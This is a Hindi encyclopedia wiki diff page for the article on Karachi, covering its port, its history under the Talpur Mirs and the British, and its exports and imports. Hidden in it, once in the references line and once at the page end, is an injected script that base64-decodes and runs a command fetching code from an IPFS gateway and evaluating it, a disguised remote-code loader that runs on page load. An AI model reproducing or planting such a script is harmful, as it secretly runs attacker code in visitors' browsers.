Difference between revisions of "कराची"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सन " to " सन् ")
 
Line 1: Line 1:
 
[[चित्र:Port-of-Karachi.jpg|thumb|250px|बंदरगाह, कराची]]
 
[[चित्र:Port-of-Karachi.jpg|thumb|250px|बंदरगाह, कराची]]
'''कराची''' [[सिंधु नदी|सिंध नदी]] के त्रिभुज पर स्थित अविभाजित [[भारत]] का तृतीय बंदरगाह तथा वर्तमान में [[पाकिस्तान]] के [[सिंध प्रांत]] की राजधानी और उस देश का प्रथम बंदरगाह है। यह बंदरगाह एक लंबी शैलभित्ति द्वारा [[अरब सागर]] की धाराओं तथा तीव्र पवनों से सुरक्षित है।  
+
'''कराची''' [[सिंधु नदी|सिंध नदी]] के त्रिभुज पर स्थित अविभाजित [[भारत]] का तृतीय [[बंदरगाह]] तथा वर्तमान में [[पाकिस्तान]] के [[सिंध प्रांत]] की राजधानी और उस देश का प्रथम बंदरगाह है। यह बंदरगाह एक लंबी शैलभित्ति द्वारा [[अरब सागर]] की धाराओं तथा तीव्र पवनों से सुरक्षित है।  
 
==इतिहास==
 
==इतिहास==
सन 1750 ई. के पूर्व इस स्थान पर किसी नगर के स्थापित होने के चिह्न नहीं मिलते। सिंध के प्राचीन बंदरगाह, शाह बंदर, के पट जाने के कारण इस स्थल पर स्थित एक गाँव के व्यापार को काफ़ी सहायता मिली। धीरे-धीरे यह नर के रूप में आया, जिसे तालपुर के मीरों ने अपने अधिकार में कर लिया। उन्होंने 'बंदरगाह' के मुख्य द्वार, मनोरा पर एक दुर्ग भी बनाया। सन् 1843 ई. में जब [[अंग्रेज़|अंग्रज़ों]] ने इस नगर पर आधिपत्य जमाया, इसकी जनसंख्या केवल 14,000 थी। कराची आधुनिक युग का नगर है। सड़कें अपेक्षाकृत चौड़ी हैं, तथा इमारतों में नवीनता है। कुछ इमारते अच्छी हैं। कॉटन एक्सचेंज, एसेंबली हाउस, हवाई अड्डा आदि का निर्माण अर्वाचीन शैली पर हुआ है।
+
संभवत: '''प्राचीन क्रोकल''' जिसका [[मेगस्थनीज]] ने [[सिंध प्रदेश]] में उल्लेख किया है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=141|url=}}</ref>सन 1750 ई. के पूर्व इस स्थान पर किसी नगर के स्थापित होने के चिह्न नहीं मिलते। [[सिंध]] के प्राचीन [[बंदरगाह]], शाह बंदर, के पट जाने के कारण इस स्थल पर स्थित एक [[गाँव]] के व्यापार को काफ़ी सहायता मिली। धीरे-धीरे यह नगर के रूप में आया, जिसे तालपुर के मीरों ने अपने अधिकार में कर लिया। उन्होंने 'बंदरगाह' के मुख्य द्वार, '''मनोरा''' पर एक [[दुर्ग]] भी बनाया। सन् 1843 ई. में जब [[अंग्रेज़|अंग्रज़ों]] ने इस नगर पर आधिपत्य जमाया, इसकी जनसंख्या केवल 14,000 थी। कराची '''आधुनिक युग का नगर''' है। सड़कें अपेक्षाकृत चौड़ी हैं, तथा इमारतों में नवीनता है। कुछ इमारतें अच्छी हैं। कॉटन एक्सचेंज, एसेंबली हाउस, हवाई अड्डा आदि का निर्माण अर्वाचीन शैली पर हुआ है।
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
पंजाब के नहरी क्षेत्रों में [[गेहूँ]] के उत्पादन की वृद्धि से कराची से गेहूँ का निर्यात अधिक बढ़ गया। [[गेहूँ]] के अतिरिक्त तिलहन, रुई, ऊन, चमड़े तथा खाल, हड्डी आदि वस्तुएँ यहाँ से निर्यात की जाती हैं। आयात की वस्तुओं में मशीनें, मोटर गाड़ियाँ पेट्रोल, चीनी, [[लोहा]] तथा लोहे के समान मुख्य हैं।
+
पंजाब के नहरी क्षेत्रों में [[गेहूँ]] के उत्पादन की वृद्धि से कराची से गेहूँ का निर्यात अधिक बढ़ गया। [[गेहूँ]] के अतिरिक्त [[तिलहन]], रुई, ऊन, चमड़े तथा खाल, हड्डी आदि वस्तुएँ यहाँ से निर्यात की जाती हैं। आयात की वस्तुओं में मशीनें, मोटर गाड़ियाँ पेट्रोल, चीनी, [[लोहा]] तथा लोहे के समान मुख्य हैं।
  
  
Line 16: Line 16:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{विदेशी स्थान}}
 
{{विदेशी स्थान}}
[[Category:विदेशी नगर]][[Category:विदेशी स्थान]]
+
[[Category:विदेशी नगर]][[Category:विदेशी स्थान]] [[Category:ऐतिहासिक स्थानावली]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:01, 1 June 2018

thumb|250px|bandaragah, karachi karachi siandh nadi ke tribhuj par sthit avibhajit bharat ka tritiy bandaragah tatha vartaman mean pakistan ke siandh praant ki rajadhani aur us desh ka pratham bandaragah hai. yah bandaragah ek lanbi shailabhitti dvara arab sagar ki dharaoan tatha tivr pavanoan se surakshit hai.

itihas

sanbhavat: prachin krokal jisaka megasthanij ne siandh pradesh mean ullekh kiya hai.[1]san 1750 ee. ke poorv is sthan par kisi nagar ke sthapit hone ke chihn nahian milate. siandh ke prachin bandaragah, shah bandar, ke pat jane ke karan is sthal par sthit ek gaanv ke vyapar ko kafi sahayata mili. dhire-dhire yah nagar ke roop mean aya, jise talapur ke miroan ne apane adhikar mean kar liya. unhoanne 'bandaragah' ke mukhy dvar, manora par ek durg bhi banaya. sanh 1843 ee. mean jab aangrazoan ne is nagar par adhipaty jamaya, isaki janasankhya keval 14,000 thi. karachi adhunik yug ka nagar hai. s dakean apekshakrit chau di haian, tatha imaratoan mean navinata hai. kuchh imaratean achchhi haian. k aautan eksacheanj, eseanbali haus, havaee adda adi ka nirman arvachin shaili par hua hai.

udyog aur vyapar

panjab ke nahari kshetroan mean gehooan ke utpadan ki vriddhi se karachi se gehooan ka niryat adhik badh gaya. gehooan ke atirikt tilahan, ruee, oon, cham de tatha khal, haddi adi vastuean yahaan se niryat ki jati haian. ayat ki vastuoan mean mashinean, motar ga diyaan petrol, chini, loha tatha lohe ke saman mukhy haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

“khand 2”, hindi vishvakosh, 1960 (hindi), bharatadiskavari pustakalay: nagari pracharini sabha varanasi, 419.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharat diskavari pustakalay |prishth sankhya: 141 |

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>